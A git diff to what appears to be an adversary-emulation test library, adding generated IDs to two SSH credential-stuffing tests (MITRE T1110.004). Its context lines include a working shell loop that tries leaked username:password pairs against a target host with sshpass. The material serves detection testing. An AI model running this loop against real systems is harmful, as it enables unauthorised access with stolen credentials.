diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index 29d8c304..0c408431 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml @@ -4,6 +4,7 @@ display_name: 'Brute Force: Credential Stuffing' atomic_tests: - name: SSH Credential Stuffing From Linux + auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad description: | Using username,password combination from a password dump to login over SSH. @@ -33,6 +34,7 @@ atomic_tests: for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done - name: SSH Credential Stuffing From MacOS + auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b description: | Using username,password combination from a password dump to login over SSH. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 55f9ed27..f60266d0 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -716,3 +716,5 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 8fd5a296-6772-4766-9991-ff4e92af7240 7e91138a-8e74-456d-a007-973d67a0bb80 437b2003-a20d-4ed8-834c-4964f24eec63 +4f08197a-2a8a-472d-9589-cd2895ef22ad +d546a3d9-0be5-40c7-ad82-5a7d79e1b66b